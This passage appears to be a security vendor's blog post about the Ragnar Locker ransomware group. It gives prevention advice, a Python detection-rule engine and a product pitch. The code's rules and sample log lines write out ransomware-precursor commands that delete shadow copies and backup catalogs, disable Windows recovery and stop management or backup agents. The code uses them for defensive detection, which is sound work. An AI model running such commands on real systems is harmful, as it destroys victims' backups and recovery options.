Ragnar Locker was not a Ransomware-as-a-Service (RaaS) operation constantly advertising for new affiliates, so we assume it worked with a fairly constant group of people. It also seemed capable of developing new attack methods, like the ESXi encryptor that was recently deployed by the Dark Angels group in an attack on industrial giant Johnson Controls.

Ragnar Locker specifically targeted software commonly used by managed service providers (MSPs) so that its attacks would not be detected and stopped through those tools. It also used the double extortion method, combining encryption with data theft, pretty much from the start.

The questionable honor of being the last victim posted on the leak site went to IP international presence on October 6, 2023. There is always the chance that some victims are now left without an option to negotiate with the ransomware group.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
  • Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.
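The "detect intrusions" step above is the one most teams struggle to turn into something concrete. What follows is an added example, not Malwarebytes code and not a description of anything Ragnar Locker specifically did: a small Python rule engine run over constructed process-creation log lines. It flags common pre-encryption tradecraft (shadow copy deletion, backup catalog wipe, disabling Windows recovery) and, in keeping with the point that Ragnar Locker went after MSP tooling, treats a service stop as suspicious only when the target name looks like management, backup or security software. The log format, host and user names, and the MSP_TOOL_HINTS list are all assumptions; tune them to your own telemetry.

```python
import re
from dataclasses import dataclass

# Hypothetical substrings of service/process names an intruder stops to blind
# an MSP's remote-management and endpoint tooling; tune these to your own fleet.
MSP_TOOL_HINTS = ("rmm", "remote", "agent", "mbam", "backup", "edr")

# Generic ransomware-precursor commands seen shortly before mass encryption.
# These are common tradecraft, not indicators attributed to Ragnar Locker here.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
    ("backup_catalog_wipe",
     re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I)),
    ("recovery_disabled",
     re.compile(r"bcdedit(?:\.exe)?\b.*recoveryenabled\s+no", re.I)),
    ("service_stop",
     re.compile(r"\b(?:net(?:\.exe)?\s+stop|sc(?:\.exe)?\s+stop|taskkill(?:\.exe)?\s+/im)\s+(\S+)", re.I)),
]

# Constructed log format: "<timestamp> host=<name> user=<name> cmd=<command line>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


@dataclass
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str


def parse_event(line: str):
    """Return the fields of one log line, or None if it is not in the expected format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def evaluate(lines):
    """Run every rule over every event and return the matches."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for rule, pattern in RULES:
            m = pattern.search(ev["cmd"])
            if not m:
                continue
            if rule == "service_stop":
                # Stopping a random service is noise; only flag it when the
                # target looks like management, backup or security tooling.
                target = m.group(1).strip('"').lower()
                if not any(hint in target for hint in MSP_TOOL_HINTS):
                    continue
                rule = "msp_tool_tampering"
            findings.append(Finding(ev["host"], ev["user"], rule, ev["cmd"]))
    return findings


def score_hosts(findings):
    """Escalate hosts that trip two or more distinct rules; single hits get a review."""
    rules_by_host = {}
    for f in findings:
        rules_by_host.setdefault(f.host, set()).add(f.rule)
    return {host: ("isolate" if len(rules) >= 2 else "review")
            for host, rules in rules_by_host.items()}


# Constructed sample events (not real telemetry). FS01 shows the classic
# pre-encryption sequence; WS17 is benign admin noise; WS22 has a single hit.
SAMPLE_LOG = [
    r"2023-10-06T02:11:03Z host=FS01 user=CORP\svc_backup cmd=vssadmin.exe delete shadows /all /quiet",
    r'2023-10-06T02:11:09Z host=FS01 user=CORP\svc_backup cmd=net stop "RMMAgent"',
    r"2023-10-06T02:11:20Z host=FS01 user=CORP\svc_backup cmd=bcdedit /set {default} recoveryenabled No",
    r"2023-10-06T02:14:44Z host=WS17 user=CORP\jdoe cmd=net stop Spooler",
    r"2023-10-06T02:15:01Z host=WS22 user=CORP\admin cmd=wbadmin delete catalog -quiet",
    r"2023-10-06T02:16:00Z host=WS17 user=CORP\jdoe cmd=notepad.exe C:\Users\jdoe\notes.txt",
]

if __name__ == "__main__":
    hits = evaluate(SAMPLE_LOG)
    for f in hits:
        print(f"{f.host:5} {f.user:16} {f.rule:22} {f.cmdline}")
    print(score_hosts(hits))
```

Run against the sample, FS01 trips three distinct rules and is marked "isolate", WS22 gets a single "review", and WS17's Spooler restart is ignored. In a real deployment the same rules would read Sysmon event ID 1 or Windows 4688 process-creation records rather than a constructed list, and the host-level correlation window is what separates catching the operator during staging from finding encrypted shares in the morning.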

Malwarebytes EDR and MDR remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW